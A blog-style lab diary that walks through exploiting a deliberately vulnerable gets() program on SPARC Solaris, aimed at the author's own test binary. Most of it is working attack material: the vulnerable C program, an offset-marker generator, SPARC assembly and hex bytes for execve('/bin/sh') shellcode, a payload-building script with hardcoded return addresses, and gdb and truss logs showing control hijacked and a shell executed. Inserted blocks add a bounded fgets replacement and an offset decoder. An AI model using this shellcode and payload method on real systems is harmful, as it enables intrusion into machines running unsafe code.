Holy Mother of Pearl — SPARC Exploitation Excerpts!

SO, back to exploiting the userland gets() function.

Vulnerable Test Prog

#include <stdio.h>
unsigned long get_sp( void ) {
        __asm__("or %sp,%sp,%r1");
// %r1 may have to be %i0 in some circumstances?? weirdness..
}

void copy( ){
        char buf[256];

        gets(buf);
}

int main( ) {
        unsigned long ret = get_sp();
        fprintf (stderr, "sp = 0x%x\n", ret);
        copy(  );
        return 0;
}
$ gcc -g v.c -o v
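For contrast, here is a bounded replacement for copy() (added here, not the post's own code). It keeps v.c's 256-byte buffer but reads with fgets(), and puts two canaries above the buffer as stand-ins for the saved %fp and %i7 slots to show that a 400-byte line cannot reach them; the struct layout, the canary value and the tmpfile() standing in for the redirected stdin are assumptions of the demo.

```c
#include <stdio.h>
#include <string.h>

/* Stand-in for the part of copy()'s frame that the gets() overflow in v.c
 * clobbers: the 256-byte buffer with the saved %fp and %i7 slots right
 * above it. The struct is an assumption for the demo, not the real SPARC
 * register window layout; it just keeps "what sits above buf" explicit. */
struct frame_sim {
    char buf[256];
    unsigned long saved_fp;   /* canary standing in for the %fp slot */
    unsigned long saved_ret;  /* canary standing in for the %i7 slot */
};

/* Bounded replacement for gets(buf): fgets() stops after bufsz-1 bytes or
 * at '\n', so nothing past buf is ever written. Like gets() it drops the
 * newline (0x0a still ends the read, as noted on this page); unlike gets()
 * an over-long line is truncated and the rest drained so the next read
 * starts on a fresh line. Returns the bytes kept, or -1 on EOF/error. */
int read_line_bounded(FILE *in, char *buf, size_t bufsz)
{
    if (bufsz == 0 || fgets(buf, (int)bufsz, in) == NULL)
        return -1;
    size_t n = strlen(buf);
    if (n > 0 && buf[n - 1] == '\n') {
        buf[--n] = '\0';
    } else if (n == bufsz - 1) {
        int ch;
        while ((ch = fgetc(in)) != EOF && ch != '\n')
            ;   /* drain the remainder of the over-long line */
    }
    return (int)n;
}

/* Run `len` bytes of `input` (a tmpfile() stands in for the redirected
 * stdin) through the bounded reader into a frame_sim. Returns the bytes
 * kept, or -1 if either slot above the buffer changed, i.e. an overflow. */
int copy_into_frame(const char *input, size_t len)
{
    const unsigned long canary = 0xffbefe78UL;  /* the original %fp value quoted below */
    struct frame_sim f;
    f.saved_fp = f.saved_ret = canary;

    FILE *in = tmpfile();
    if (in == NULL)
        return -2;
    fwrite(input, 1, len, in);
    rewind(in);
    int kept = read_line_bounded(in, f.buf, sizeof f.buf);
    fclose(in);

    if (f.saved_fp != canary || f.saved_ret != canary)
        return -1;
    return kept;
}

/* Constructed input: a 400-byte line with no newline, well past the 256
 * bytes that v.c's gets() would happily exceed. Expect 255 bytes kept and
 * both slots intact. */
int demo_overlong(void)
{
    static char line[400];
    memset(line, 'A', sizeof line);
    return copy_into_frame(line, sizeof line);
}

int main(void)
{
    printf("short line: kept %d\n", copy_into_frame("Hello\nmore", 10));  /* 5 */
    printf("400-byte line: kept %d\n", demo_overlong());                 /* 255 */
    return 0;
}
```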

This invoke script helps me keep the stack offset the same whether I run the program in GDB or not..
Note: it doesn’t work that well on my Sun Blade 150, but it works well on the school server…
invoke script

#!/bin/bash

while getopts "dte:h?" opt ; do
  case "$opt" in
    h|\?)
      printf "usage: %s -e KEY=VALUE prog [args...]\n" $(basename $0)
      exit 0
      ;;
    t)
      tty=1
      gdb=1
      ;;
    d)
      gdb=1
      ;;
    e)
      env=$OPTARG
      ;;
  esac
done

shift $(expr $OPTIND - 1)
prog=$(readlink -f $1)
shift
if [ -n "$gdb" ] ; then
  if [ -n "$tty" ]; then
    touch /tmp/gdb-debug-pty
    exec env - $env TERM=screen PWD=$PWD /usr/local/gnu/bin/gdb -tty /tmp/gdb-debug-pty --args $prog "$@"
  else
    exec env - $env TERM=screen PWD=$PWD /usr/local/gnu/bin/gdb --args $prog "$@"
  fi
else
  exec env - $env TERM=screen PWD=$PWD $prog "$@"
fi

I use the invoke script with absolute paths. Here’s an example:

/home/bazz/tools/tmp/latest/invoke2 v < super_payload_lol
# or i want to use gdb:
/home/bazz/tools/tmp/latest/invoke2 -d v
# then from in gdb:
# r < super_payload

Interesting note on overflowing a buffer accepted through standard input: the 0x0a byte has the same effect as a null byte. That was not documented anywhere >_< 0x0a is \n iirc; I wonder if the \r byte (0x0d) has the same effect.. I could try it out but I’m not…

Below is my buffer overflow “marker” program source code. It is documented at https://blogs.umb.edu/michaelbazzinott001/2014/09/25/alternating-payload-automated-offset-calculation-and-identification/
along with the shellcode assist program. It creates a block of the specified length and outputs it to stdout;
you are then required to concatenate any arbitrary data plus the null byte (or, apparently, \n).

#include <stdio.h>
#include <stdlib.h>

// SPARC uses sys/inttypes.h
#ifdef __sun
  #include <sys/inttypes.h>
#else
  #include <stdint.h>
#endif

// this form provides buffer experimentation foundation
// buffer will be created up to numbytes desired, but < MAX, specified
// on the command line argument
// form: 0x[01-ff][41-5a][41-5a][41-5a]

// 0x41-0x5a range is chars 'A' to 'Z'
// An extended range < 'A' to > 'Z' could modify this program to extend
//the MAX length of the buffer

#define CHAR_RANGE (('Z'-'A')+1)  // 'Z' - 'A' is 25, but I know
// there are 26 letters in the alphabet. I call this inclusive subtraction,
// when I add 1 to get the real desired value. There is also inclusive
// addition I think. I'm using terms I created.
// little proof program to figure this out
/*

#include <stdio.h>

// Conclusion: Inclusive Subtraction requires add 1

int main()
{
  printf("Derp Face, I'm ready :) \n");
  printf("'Z' - 'A' = %d", ('Z'-'A')+1);

  return 0;
}

*/

#define MAX (CHAR_RANGE * 255 * 4)
// Arbitrary MAX that is derived from the following formula:
// 26a * 255b * 4c
// a [letters of the alphabet]
// b [ byte field width excluding 0 (null byte)]
// c [ 4 bytes per entry ie. 0x01414141 ]

#define RANGE (26*4)

// does the following operation to get the offset (counted in 4-byte groups):
// [(msb - 1) * 26] + (lsb - 0x41)
// computed in unsigned long: with uint8_t intermediates, (msb - 1) * 26
// would wrap once msb reaches 0x0b and the reported offset would be wrong
unsigned long getSmashOffset(const unsigned long *smashval)
{
  unsigned long msb, lsb;

  msb = ( *smashval >> 24 ) & 0xff;   // tag byte, starts at 1
  lsb = *smashval & 0xff;             // letter byte, 'A'..'Z'

  return (msb - 1) * 26 + (lsb - 0x41);
}

int main(int argc, char **argv)
{
  char a=0x41;
  char c=1;
  int i, rc=0;

  if (argc != 2)
  {
    printf ("You're doing it wrong! \n");
    printf ("Usage: %s [numbytes <= %d]|[smashed-stack-val]\n", argv[0], MAX);
    exit (1);
  }

  unsigned long arg, numbytes;
  arg = numbytes = strtoul( argv[1], (void *)0, 0 );
  // anything above MAX is taken to be a smashed stack value to decode
  if (arg > MAX)
  {
    if (arg < 0x01414141)
    {
      printf ("You can't have an overflow amount > %d\n", MAX);
      exit(2);
    }
    else
    {
      printf ("%lu\n", getSmashOffset(&arg));
      return 0;
    }
  }

  // emit groups of 4 bytes: one tag byte (c, starting at 1) followed by
  // three copies of the letter (a, cycling 'A'..'Z'); c advances after
  // every 26 groups, i.e. every RANGE bytes
  for (a=0x40,i=0,c=1; i < (numbytes); i++)
  {
    if (i%4 == 0)
    {
      printf("%c", c);
      a++;
      if (a == 'Z'+1)
        a = 0x41;
    }
    else
      printf("%c",a);
    rc ++;
    if (rc == RANGE)
    {
      rc=0; c++;
      if (!c)        // never emit a null byte as the tag
        c++;
    }
  }
  return 0;
}
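To make the 328 used in the build steps further down traceable, here is a decoder (added here, not the post's own tool) that turns a marker word back into a byte offset and walks a stack dump for the first word that breaks the sequence; the sample words are copied from the x/96x $sp output on this page, not read from a live process, and the function names are my own.

```c
#include <stdio.h>
#include <stdint.h>

/* Decode one marker word of the form 0x[01-ff][41-5a][41-5a][41-5a] back to
 * its byte offset in the generated pattern. The group index is
 * (msb - 1) * 26 + (lsb - 'A') and every group is 4 bytes wide, which is why
 * the marker program's output has to be multiplied by 4 to become a byte
 * offset. Arithmetic is done in unsigned/long so tag bytes >= 0x0b do not
 * wrap. Returns -1 if the word is not a marker word. */
long marker_byte_offset(uint32_t w)
{
    unsigned msb = (w >> 24) & 0xff;
    unsigned b2  = (w >> 16) & 0xff;
    unsigned b1  = (w >>  8) & 0xff;
    unsigned lsb =  w        & 0xff;
    if (msb == 0 || lsb < 'A' || lsb > 'Z' || b2 != lsb || b1 != lsb)
        return -1;
    return ((long)(msb - 1) * 26 + (long)(lsb - 'A')) * 4;
}

/* Walk a dump of 32-bit words (lowest address first) and report the byte
 * offset, counted from the start of the overflowing buffer, of the first
 * word that breaks the marker sequence. Contiguity is checked, so a dump
 * that starts mid-pattern (as x/96x $sp does) is fine: the first word
 * pins down where in the pattern we are. Returns -1 if the sequence never
 * breaks or the first word is not a marker. */
long find_pattern_break(const uint32_t *words, size_t n)
{
    if (n == 0)
        return -1;
    long expect = marker_byte_offset(words[0]);
    if (expect < 0)
        return -1;
    for (size_t i = 0; i < n; i++, expect += 4) {
        if (marker_byte_offset(words[i]) != expect)
            return expect;   /* first slot past the pattern: where %fp landed */
    }
    return -1;
}

/* Constructed sample: the first 16 words of the page's dump at 0xffbefe00.
 * 0x03515151 decodes to offset 272, so the buffer begins 272 bytes lower. */
static const uint32_t sample_dump[] = {
    0x03515151, 0x03525252, 0x03535353, 0x03545454,
    0x03555555, 0x03565656, 0x03575757, 0x03585858,
    0x03595959, 0x035a5a5a, 0x04414141, 0x04424242,
    0x04434343, 0x04444444, 0xffbefd78, 0xffbefef8,
};

long sample_break(void)
{
    return find_pattern_break(sample_dump, sizeof sample_dump / sizeof sample_dump[0]);
}

int main(void)
{
    printf("0x04444444 sits at byte offset %ld\n", marker_byte_offset(0x04444444)); /* 324 */
    printf("pattern breaks at byte offset %ld\n", sample_break());                  /* 328 */
    return 0;
}
```

The break at 328 is the %fp slot, which is exactly the length passed to alternating_payload3 in the build steps, and 0xffbefef8 four bytes later is the %i7 slot.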

Check it out, here’s a stupid program that uses the write syscall to write some text “Hello” to stdout.

write_raw.S

bazz@blade72[pts/3][~/nobackup/fun] cat write_raw.S
.globl main
main:
! %o1 must point to the string! let's store the string on the stack
set 0x48656c6c, %o0     !"Hell"
st %o0, [%sp+84]
set 0x6f0a0000, %o0     ! "o\n"
st %o0, [%sp+88]
add %sp, 84, %o1

mov  1, %o0
mov  7, %o2
mov  4, %g1
ta  8

! addition to prevent illegal instruction failure
mov 1, %g1  ! move 1(exit() syscall) into %g1
mov 0, %o0    ! move 0(return address) into %o0
ta 8          ! call the kernel
bazz@blade72[pts/3][~/nobackup/fun] gcc write_raw.S -o /tmp/write_ex
bazz@blade72[pts/3][~/nobackup/fun] /tmp/write_ex
Hello
bazz@blade72[pts/3][~/nobackup/fun]

This gets transformed to shellcode like this:

bazz@blade72[pts/3][~/nobackup/fun/asmshell] declare -f buildsc
buildsc ()
{
    if [ "$1" = "" ]; then
        echo 'buildsc filename no extension';
        return 1;
    fi;
    as $1.S -o $1.o;
    objcopy -O binary $1.o $1.bin
}

An alternative to objcopy, which also shows how to do it for sparcv9:

bazz@vm72[pts/3][~/tools/tmp] cat asmtobin.sh
as -Av9 $1.S -o $1.o
ld $1.o -o $1.bin --oformat=binary
bazz@vm72[pts/3][~/tools/tmp]
bazz@blade72[pts/3][~/nobackup/fun] buildsc write_raw
bazz@blade72[pts/3][~/nobackup/fun] od -X -A x write_raw.bin
000000 1112195b 9012206c d023a054 111bc280
000010 d023a058 9203a054 90102001 94102007
000020 82102004 91d02008 82102001 90102000
000030 91d02008
000034

Then, to lay the buffer out correctly; this knowledge comes from experimenting with and debugging the target binary..

bazz@blade72[pts/1][~/tools/tmp/latest] cat build_shellcode_steps
./alternating_payload3 328  # payload size to arrive at %fp and %i7
# fp which becomes the $sp I use during our infected run. These vals
# were obtained from live debugging and a better final adaptive method should be used
# at production level.
# orig val: ffbefe78
printf "\xff\xbe\xfd\x78"
# return address:
# original val: ffbefe78
printf "\xff\xbe\xfe\xf8"
#printf "\xff\xbe\xfe\x38" >> payload
# orig val: 0x40
# experimented displacing the payload farther "up" the stack
perl -e 'print "A"x0xc0'
cat $1 # payload bin file
printf "\x00"
bazz@blade72[pts/1][~/tools/tmp/latest] ./build_shellcode_steps write_raw.bin > payload
bazz@blade72[pts/1][~/tools/tmp/latest] $PWD/invoke2 -d v
GNU gdb 5.3
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.7"...
(gdb) list 0
1       #include <stdio.h>
2       unsigned long get_sp( void ) {
3               __asm__("or %sp,%sp,%r1");
4       }
5
6       void copy( ){
7               char buf[256];
8
9               gets(buf);
10      }
(gdb)
11
12      int main( ) {
13              unsigned long ret = get_sp();
14              fprintf (stderr, "sp = 0x%x\n", ret);
15              copy(  );
16              return 0;
17      }
(gdb) b 16
Breakpoint 1 at 0x10790: file v.c, line 16.
(gdb) r < payload
Starting program: /nobackup/blade74_sd0g/bazz/tmp/latest/v < payload
sp = 0xffbefd90

Breakpoint 1, main () at v.c:16
16              return 0;
(gdb) # overflow just happened
(gdb) x/96x $sp
# at this point, this current stack frame's %fp and %i7 are below and are the infected ones
# that will be returned upon the next ret restore.
# at the top of this printout is a continuation from my marker program,
# you can see the pattern. The beginning of the buffer could be looked at by
# going lower in memory ie. x/96x $sp-96 or farther down as well..
# but that's not necessary for us. this post is to show how the write syscalls
# are about to be executed just fine, but later the execv
# syscall just returns and I don't get a shell for some reason.
0xffbefe00:     0x03515151      0x03525252      0x03535353      0x03545454
0xffbefe10:     0x03555555      0x03565656      0x03575757      0x03585858
0xffbefe20:     0x03595959      0x035a5a5a      0x04414141      0x04424242
0xffbefe30:     0x04434343      0x04444444      0xffbefd78      0xffbefef8
0xffbefe40:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe50:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe60:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe70:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe80:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe90:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefea0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefeb0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefec0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefed0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefee0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefef0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbeff00:     0x1112195b      0x9012206c      0xd023a054      0x111bc280
0xffbeff10:     0xd023a058      0x9203a054      0x90102001      0x94102007
0xffbeff20:     0x82102004      0x91d02008      0x82102001      0x90102000
0xffbeff30:     0x91d02008      0x00002000      0x000007d0      0x00001caf
0xffbeff40:     0x000007d1      0x00001caf      0x000007d2      0x00002801
0xffbeff50:     0x000007d3      0x00002801      0x000007d9      0x00000007
0xffbeff60:     0x00000000      0x00000000      0x2f6e6f62      0x61636b75
---Type <return> to continue, or q <return> to quit---
0xffbeff70:     0x702f626c      0x61646537      0x345f7364      0x30672f62
(gdb) si
17      }
(gdb)
0x00010798      17      }
(gdb) x/4i $pc
0x10798 <main+64>:      ret
0x1079c <main+68>:      restore
0x107a0 <main+72>:      retl
0x107a4 <main+76>:      add  %o7, %l7, %l7
(gdb) si
0x0001079c      17      }
(gdb)
0xffbeff00 in ?? ()
(gdb) x/16i $pc
0xffbeff00:     sethi  %hi(0x48656c00), %o0
0xffbeff04:     or  %o0, 0x6c, %o0      ! 0x48656c6c
0xffbeff08:     st  %o0, [ %sp + 0x54 ]
0xffbeff0c:     sethi  %hi(0x6f0a0000), %o0
0xffbeff10:     st  %o0, [ %sp + 0x58 ]
0xffbeff14:     add  %sp, 0x54, %o1
0xffbeff18:     mov  1, %o0
0xffbeff1c:     mov  7, %o2
0xffbeff20:     mov  4, %g1
0xffbeff24:     ta  8
0xffbeff28:     mov  1, %g1
0xffbeff2c:     clr  %o0
0xffbeff30:     ta  8
0xffbeff34:     unimp  0x2000
0xffbeff38:     unimp  0x7d0
0xffbeff3c:     unimp  0x1caf
(gdb) si
0xffbeff04 in ?? ()
(gdb)
0xffbeff08 in ?? ()
(gdb)
0xffbeff0c in ?? ()
(gdb)
0xffbeff10 in ?? ()
(gdb)
0xffbeff14 in ?? ()
(gdb)
0xffbeff18 in ?? ()
(gdb)
0xffbeff1c in ?? ()
(gdb)
0xffbeff20 in ?? ()
(gdb)
0xffbeff24 in ?? ()
(gdb)
Hello
0xffbeff28 in ?? ()
(gdb)
0xffbeff2c in ?? ()
(gdb)
0xffbeff30 in ?? ()
(gdb)

Program exited normally.
(gdb) del
Delete all breakpoints? (y or n) y
(gdb) r < payload
Starting program: /nobackup/blade74_sd0g/bazz/tmp/latest/v < payload
sp = 0xffbefd90
Hello

Program exited normally.
(gdb) q
bazz@blade72[pts/1][~/tools/tmp/latest] $PWD/invoke2 v < payload
sp = 0xffbefd90
Hello
bazz@blade72[pts/1][~/tools/tmp/latest]

OK, I clearly demonstrated how the write-example buffer overflow hijacked control just fine.

But now.. a shell spawn fails, and I don’t know why:

bazz@blade72[pts/3][~/nobackup/fun/asmshell] cat asmshell3.S
.globl main
main:
set 0x2f62696e, %o0
st %o0, [%sp+84]
set 0x2f736800, %o0
st %o0, [%sp+88]
add %sp, 84, %o0
clr [%sp+92]
st %o0, [%sp+76]
clr [%sp+80]
add %sp, 76, %o1
xor %o5,%o5,%o2
mov 0x3b, %g1
ta 8
!ta 8
! addition to prevent illegal instruction failure
xor %o5,%o5,%o0
!add %o1,%o1,%o0
! interprets as end of string!! even without null byte ! and o1, 2, %o0         ! exit(0)
mov     1, %g1
ta      8

bazz@blade72[pts/3][~/nobackup/fun/asmshell] buildsc asmshell3
bazz@blade72[pts/3][~/nobackup/fun/asmshell] od -X -A x asmshell3.bin
000000 110bd89a 9012216e d023a054 110bdcda
000010 d023a058 9003a054 c023a05c d023a04c
000020 c023a050 9203a04c 941b400d 8210203b
000030 91d02008 901b400d 82102001 91d02008
000040
bazz@blade72[pts/3][~/nobackup/fun/asmshell] cp asmshell3.bin ~/tools/tmp/latest

bazz@blade72[pts/1][~/tools/tmp/latest] ./build_shellcode_steps asmshell3.bin > payload
bazz@blade72[pts/1][~/tools/tmp/latest] $PWD/invoke2 -d v
GNU gdb 5.3
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.7"...
(gdb) b 16
Breakpoint 1 at 0x10790: file v.c, line 16.
(gdb) r < payload
Starting program: /nobackup/blade74_sd0g/bazz/tmp/latest/v < payload
sp = 0xffbefd90

Breakpoint 1, main () at v.c:16
16              return 0;
(gdb) x/96x $sp
0xffbefe00:     0x03515151      0x03525252      0x03535353      0x03545454
0xffbefe10:     0x03555555      0x03565656      0x03575757      0x03585858
0xffbefe20:     0x03595959      0x035a5a5a      0x04414141      0x04424242
0xffbefe30:     0x04434343      0x04444444      0xffbefd78      0xffbefef8
0xffbefe40:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe50:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe60:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe70:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe80:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe90:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefea0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefeb0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefec0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefed0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefee0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefef0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbeff00:     0x110bd89a      0x9012216e      0xd023a054      0x110bdcda
0xffbeff10:     0xd023a058      0x9003a054      0xc023a05c      0xd023a04c
0xffbeff20:     0xc023a050      0x9203a04c      0x941b400d      0x8210203b
0xffbeff30:     0x91d02008      0x901b400d      0x82102001      0x91d02008
0xffbeff40:     0x000007d1      0x00001caf      0x000007d2      0x00002801
0xffbeff50:     0x000007d3      0x00002801      0x000007d9      0x00000007
0xffbeff60:     0x00000000      0x00000000      0x2f6e6f62      0x61636b75
---Type <return> to continue, or q <return> to quit---
0xffbeff70:     0x702f626c      0x61646537      0x345f7364      0x30672f62
(gdb) c
Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.
0xff3b3be0 in ?? ()
(gdb) c
Continuing.

Program exited normally.
# NO SHELL!!!
(gdb) q
bazz@blade72[pts/1][~/tools/tmp/latest] $PWD/invoke2 v < payload
sp = 0xffbefd90
bazz@blade72[pts/1][~/tools/tmp/latest] #NO SHELL!!! 
bazz@blade72[pts/1][~/tools/tmp/latest] $PWD/invoke2 -d v
GNU gdb 5.3
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.7"...
(gdb) r < payload
Starting program: /nobackup/blade74_sd0g/bazz/tmp/latest/v < payload
sp = 0xffbefd90

Program received signal SIGTRAP, Trace/breakpoint trap.
0xff3b3be0 in ?? ()
(gdb) x/16i $pc
0xff3b3be0:     b,a   0xff3b3bec
0xff3b3be4:     b,a   0xff3b3bf0
0xff3b3be8:     b,a   0xff3b3bf4
0xff3b3bec:     mov  %g0, %o0
0xff3b3bf0:     save  %sp, -160, %sp
0xff3b3bf4:     call  0xff3b3bfc
0xff3b3bf8:     sethi  %hi(0x2c800), %l7
0xff3b3bfc:     or  %l7, 0x3b4, %l7     ! 0x2cbb4
0xff3b3c00:     addcc  %i0, %g0, %o0
0xff3b3c04:     bne  0xff3b3c60
0xff3b3c08:     add  %l7, %o7, %l7
0xff3b3c0c:     add  %sp, 0x60, %o0
0xff3b3c10:     mov  3, %l0
0xff3b3c14:     st  %l0, [ %o0 ]
0xff3b3c18:     add  %fp, 0x44, %l0
0xff3b3c1c:     st  %l0, [ %o0 + 4 ]
(gdb) q
The program is running.  Exit anyway? (y or n) y
bazz@blade72[pts/1][~/tools/tmp/latest]

I seem to be in some trap handler.. Maybe the mysteries as to why it’s returning and not spawning a shell lie in there….

TO BE CONTINUED

… UPDATE!!!!

-bash-4.3$ ./build_shellcode_steps asmshell5_interactive.bin
-bash-4.3$ truss $PWD/invoke2 v < payload
execve("/home/bazz/latest/invoke2", 0xFFBEFD3C, 0xFFBEFD4C)  argc = 3
execve("/home/bazz/bin/env", 0x001132C8, 0x0010F908)  argc = 5
execve("/home/bazz/latest/v", 0xFFBEFD64, 0x000314E0)  argc = 1
sp = 0xwrite(2, " s p   =   0 x", 7)                    = 7
ffbefdb8write(2, " f f b e f d b 8", 8)                 = 8

write(2, "\n", 1)                               = 1
ioctl(0, TCGETA, 0xFFBEFB54)                    Err#25 ENOTTY
fstat64(0, 0xFFBEFBC8)                          = 0
brk(0x00020B00)                                 = 0
brk(0x00024B00)                                 = 0
read(0, "01 A A A01 B B B01 C C C".., 8192)     = 421
read(0, 0x00020B0C, 8192)                       = 0
execve("/bin/sh", 0xFFBEFEB0, 0x00000000)  argc = 2
resolvepath("/usr/lib/ld.so.1", "/usr/lib/ld.so.1", 1023) = 16
open("/var/ld/ld.config", O_RDONLY)             Err#2 ENOENT
stat("/usr/lib/libgen.so.1", 0xFFBEF828)        = 0
resolvepath("/usr/lib/libgen.so.1", "/usr/lib/libgen.so.1", 1023) = 20
open("/usr/lib/libgen.so.1", O_RDONLY)          = 3
mmap(0x00000000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0xFF390000
mmap(0x0393CD50, 98304, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF370000
mmap(0xFF370000, 23073, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF370000
mmap(0xFF386000, 2335, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 24576) = 0xFF386000
munmap(0xFF376000, 65536)                       = 0
memcntl(0xFF370000, 6932, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0
close(3)                                        = 0
stat("/usr/lib/libc.so.1", 0xFFBEF828)          = 0
resolvepath("/usr/lib/libc.so.1", "/usr/lib/libc.so.1", 1023) = 18
open("/usr/lib/libc.so.1", O_RDONLY)            = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x13ABB888, 802816, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF280000
mmap(0xFF280000, 704216, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF280000
mmap(0xFF33C000, 24772, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 704512) = 0xFF33C000
munmap(0xFF32C000, 65536)                       = 0
memcntl(0xFF280000, 113528, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0
close(3)                                        = 0
stat("/usr/lib/libdl.so.1", 0xFFBEF828)         = 0
resolvepath("/usr/lib/libdl.so.1", "/usr/lib/libdl.so.1", 1023) = 19
open("/usr/lib/libdl.so.1", O_RDONLY)           = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x1312EF40, 8192, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF360000
mmap(0xFF360000, 2302, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF360000
close(3)                                        = 0
stat("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", 0xFFBEF540) = 0
resolvepath("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", "/usr/platform/sun4u/lib/libc_psr.so.1", 1023) = 37
open("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", O_RDONLY) = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x00000000, 8192, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANON, -1, 0) = 0xFF350000
mmap(0x00000000, 16384, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF270000
mmap(0xFF270000, 13800, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF270000
close(3)                                        = 0
munmap(0xFF390000, 8192)                        = 0
getpid()                                        = 2098 [2097]
getpgid(2098)                                   = 2097
getsid(2098)                                    = 1819
brk(0x0003A108)                                 = 0
sysconfig(_CONFIG_SIGRT_MIN)                    = 38
sysconfig(_CONFIG_SIGRT_MAX)                    = 45
sigaltstack(0xFFBEFE5C, 0x00000000)             = 0
sigaction(SIGHUP, 0x00000000, 0xFFBEFDD8)       = 0
sigaction(SIGHUP, 0xFFBEFD38, 0xFFBEFDB8)       = 0
sigaction(SIGINT, 0x00000000, 0xFFBEFDD8)       = 0
sigaction(SIGINT, 0xFFBEFD38, 0xFFBEFDB8)       = 0
sigaction(SIGQUIT, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGQUIT, 0xFFBEFD38, 0xFFBEFDB8)      = 0
sigaction(SIGILL, 0x00000000, 0xFFBEFDD8)       = 0
sigaction(SIGILL, 0xFFBEFD38, 0xFFBEFDB8)       = 0
sigaction(SIGTRAP, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGTRAP, 0xFFBEFD38, 0xFFBEFDB8)      = 0
sigaction(SIGABRT, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGABRT, 0xFFBEFD38, 0xFFBEFDB8)      = 0
sigaction(SIGEMT, 0x00000000, 0xFFBEFDD8)       = 0
sigaction(SIGEMT, 0xFFBEFD38, 0xFFBEFDB8)       = 0
sigaction(SIGFPE, 0x00000000, 0xFFBEFDD8)       = 0
sigaction(SIGFPE, 0xFFBEFD38, 0xFFBEFDB8)       = 0
sigaction(SIGBUS, 0x00000000, 0xFFBEFDD8)       = 0
sigaction(SIGBUS, 0xFFBEFD38, 0xFFBEFDB8)       = 0
sigaction(SIGSEGV, 0xFFBEFD38, 0xFFBEFDB8)      = 0
sigaction(SIGSYS, 0x00000000, 0xFFBEFDD8)       = 0
sigaction(SIGSYS, 0xFFBEFD38, 0xFFBEFDB8)       = 0
sigaction(SIGPIPE, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGPIPE, 0xFFBEFD38, 0xFFBEFDB8)      = 0
sigaction(SIGALRM, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGALRM, 0xFFBEFD38, 0xFFBEFDB8)      = 0
sigaction(SIGTERM, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGTERM, 0xFFBEFD38, 0xFFBEFDB8)      = 0
sigaction(SIGUSR1, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGUSR1, 0xFFBEFD38, 0xFFBEFDB8)      = 0
sigaction(SIGUSR2, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGUSR2, 0xFFBEFD38, 0xFFBEFDB8)      = 0
